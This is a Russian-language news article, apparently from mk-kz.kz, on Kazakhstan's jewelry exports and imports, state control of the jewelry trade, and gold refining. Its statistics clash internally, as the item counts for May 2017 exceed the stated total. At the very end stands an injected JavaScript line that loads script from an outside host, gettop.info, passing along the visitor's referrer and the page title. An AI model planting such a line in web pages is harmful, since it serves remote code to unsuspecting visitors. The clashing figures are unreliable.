Экспорт ювелирных изделий в Казахстане превышает импорт в четыре раза

Экспорт ювелирных изделий в Казахстане превышает импорт в четыре раза

В Ка­за­х­ста­не год за го­дом рас­тет обо­рот юве­ли­р­ных из­де­лий, при этом их экс­порт из стра­ны пре­вы­ша­ет им­порт в че­ты­ре ра­за. Ес­ли в 2013 го­ду бы­ли вы­да­ны 267 ак­тов гос­кон­тро­ля на 124 ты­ся­чи из­де­лий, то в 2015-м – уже 172 ак­та на бо­лее чем 529 ты­сяч укра­ше­ний.

По ее сло­вам, за один толь­ко май 2017 го­да бы­ли вы­да­ны 83 ак­та гос­кон­тро­ля на око­ло 170 ты­сяч юве­ли­р­ных из­де­лий. Из это­го чис­ла из­де­лия из се­реб­ра со­став­ля­ют 170 ты­сяч, зо­ло­та – 151 ты­ся­ча, пла­ти­ны – 141 еди­ни­ца. Та­кие дан­ные озву­чи­ла за­ме­сти­тель пред­се­да­те­ля Ко­ми­те­та тех­ни­че­ско­го ре­гу­ли­ро­ва­ния и мет­ро­ло­гии Ми­ни­стер­ства по ин­ве­сти­ци­ям и раз­ви­тию РК Шы­нар Ка­зы­ба­е­ва, вы­сту­пая в хо­де Ме­ж­ду­на­род­но­го гор­но-­ме­тал­лур­ги­че­ско­го кон­грес­са со­об­щи­ла.

Боль­ше все­го юве­ли­р­ных из­де­лий вы­во­зи­т­ся в Швей­ца­рию. При этом ос­но­в­ная до­ля им­пор­та в Ка­за­х­стан та­к­же при­хо­ди­т­ся на Швей­ца­рию. Эта стра­на за­ни­ма­ет в «ю­ве­ли­р­но­м» им­пор­те Ка­за­х­ста­на 20 про­цен­тов. США от­ста­ют на про­цент – их до­ля 19 про­цен­тов, Ита­лии – 13 про­цен­тов и ОАЭ – 10 про­цен­тов.

В Ка­за­х­ста­не вве­ден бо­лее же­ст­кий кон­троль над обо­ро­том юве­ли­р­ных из­де­лий с це­лью сни­же­ния кон­тра­бан­ды и тор­го­в­ли не­ка­че­ствен­ным то­ва­ром. Так, при ре­а­ли­за­ции юве­ли­р­ных из­де­лий обя­за­тель­но на­ли­чие про­бив­но­го клей­ма, от­тис­ка имен­ни­ка, ин­фор­ма­ции на яр­лы­ках об ис­поль­зо­ва­нии недра­го­цен­ных ка­м­ней в из­де­лии. Ес­ли из­де­лие вве­зе­но не из стран Евразий­ско­го эко­но­ми­че­ско­го со­ю­за, то ну­ж­но на­ли­чие ак­та го­су­да­ствен­но­го кон­тро­ля. До про­хо­ж­де­ния та­мо­ж­ни им­пор­тер или экс­пор­тер дол­жен прой­ти экс­пе­р­ти­зу и гос­кон­троль.

Ме­ж­ду тем, в хо­де кон­грес­са бы­ла озву­че­на и ос­но­в­ная про­б­ле­ма от­рас­ли. Ока­за­лось, что при на­ли­чии в Ка­за­х­ста­не трех дей­ству­ю­щих аф­фи­на­ж­ных за­во­да: «Каз­ци­н­к» в Усть-Ка­ме­но­гор­с­ке, «Ка­за­х­мыс» в Бал­ха­ше и го­су­дар­ствен­ный за­вод в Аста­не, из все­го объ­е­ма до­бы­ва­е­мо­го зо­ло­та боль­шая часть от­прав­ля­ет­ся на пе­ре­ра­бо­т­ку за пре­де­лы стра­ны.

«В 2016 го­ду в стра­не бы­ли до­бы­ты 76 тонн зо­ло­та. Из них внут­ри стра­ны бы­ли пе­ре­ра­бо­та­ны толь­ко 36 тонн. 40 тонн бы­ли вы­ве­зе­ны. Но вы­во­зи­т­ся зо­ло­то под кон­тро­лем го­су­дар­ства. При­чи­на это­го в не­до­стат­ке обо­га­ще­ния сы­рья. Для ре­ше­ния про­б­ле­мы пла­ни­ру­ет­ся по­стро­ить обо­га­ти­тель­ные пред­при­я­тия. К 2020 го­ду аф­фи­наж мо­жет дой­ти до 80-90 тонн от до­бы­чи. Воз­мо­ж­но­сти трех пред­при­я­тий поз­во­ля­ют пе­ре­ра­ба­ты­вать лю­бое до­бы­тое в Ка­за­х­ста­не зо­ло­то. Бо­лее то­го, мы пре­тен­ду­ем на ввоз сы­рья из-­за ру­бе­жа», — рас­ска­зал гла­ва ТОО «Тау-Кен Ал­ты­н» Мей­ра­м­га­лий Тле­у­жа­нов.

 

[ mk-kz.kz ]

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;